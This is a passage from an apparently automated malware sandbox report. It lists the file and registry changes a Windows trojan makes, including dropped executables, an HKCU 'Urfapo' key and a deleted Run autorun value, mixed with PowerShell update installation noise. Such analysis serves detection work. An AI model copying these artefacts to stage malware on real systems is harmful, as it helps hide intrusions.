%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%WinDir%\inf\SET38.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
The process PSCustomSetupUtil.exe:620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
The process PSCustomSetupUtil.exe:3908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
The process PSCustomSetupUtil.exe:1924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)
The process PSCustomSetupUtil.exe:3064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)
The process PSCustomSetupUtil.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
The process PSCustomSetupUtil.exe:2224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
The process PSCustomSetupUtil.exe:3696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
The process PSCustomSetupUtil.exe:3856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
The process PSCustomSetupUtil.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)
The process PSCustomSetupUtil.exe:2112 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:2240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
The process PSCustomSetupUtil.exe:3992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
The process PSCustomSetupUtil.exe:2288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
The process PSCustomSetupUtil.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
The process PSCustomSetupUtil.exe:3952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)
The process PSCustomSetupUtil.exe:2552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
The process PSCustomSetupUtil.exe:1496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)
The process PSCustomSetupUtil.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)
The process PSCustomSetupUtil.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)
The process PSCustomSetupUtil.exe:1284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:2556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:2140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
The process yfenaromaf.exe:1664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (0 bytes)
The process PSSetupNativeUtils.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
The process mscorsvw.exe:3128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)
The process mscorsvw.exe:2592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)
The process mscorsvw.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)
The process mscorsvw.exe:2072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)
The process mscorsvw.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)
The process mscorsvw.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)
The process regsvr32.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpf7521b9d\bindata865.exe (0 bytes)
The process regsvr32.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)
Registry activity
The process %original file name%.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 21 26 24 42 0D 64 B0 0A 16 86 EB 7C E3 5A 7D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process mofcomp.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 51 16 36 9F 50 0D 16 B3 23 94 51 4D 35 C6 C3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 82 8F CC A9 A1 40 A4 F8 51 2C 10 56 2A E6 06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process new.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 58 BA 41 08 9A 12 3C 9B D7 93 76 94 2E 20 36"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"{D53EE03B-A6B3-2507-CA3C-8ED347A30FAD}"
The process new.exe:3064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B B8 C8 2C 8F 04 92 5E 14 20 4A 9A 40 F9 90 92"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process net1.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 0E E4 26 9D 40 9F 1E 08 69 C4 F0 93 15 EF 23"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process tasklist.exe:2264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 03 B3 D6 66 83 A3 48 34 6C DF 99 8F 6B 7D 31"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 36 64 D7 9E FF B0 20 FC 56 F3 67 C9 FC EC 94"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5F AD 6C EC 7C 62 7F BA C4 FA 70 46 1A 06 A3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 C6 03 F0 C9 84 43 E1 6C 20 5B 4D 57 22 90 6B"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 56 86 4C 8D 9E 46 D1 19 B7 8E FA 9D D9 85 D6"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C D6 B0 CB FC CB 8B 30 89 87 F7 CF 2E 72 FB 08"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:2988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 81 77 D3 FF 89 57 BA 30 00 65 04 B7 50 54 0E"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 A0 EE 99 9F 38 2C 67 59 66 B0 8C CD 5E F2 41"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:1960 makes changes in the system registry.
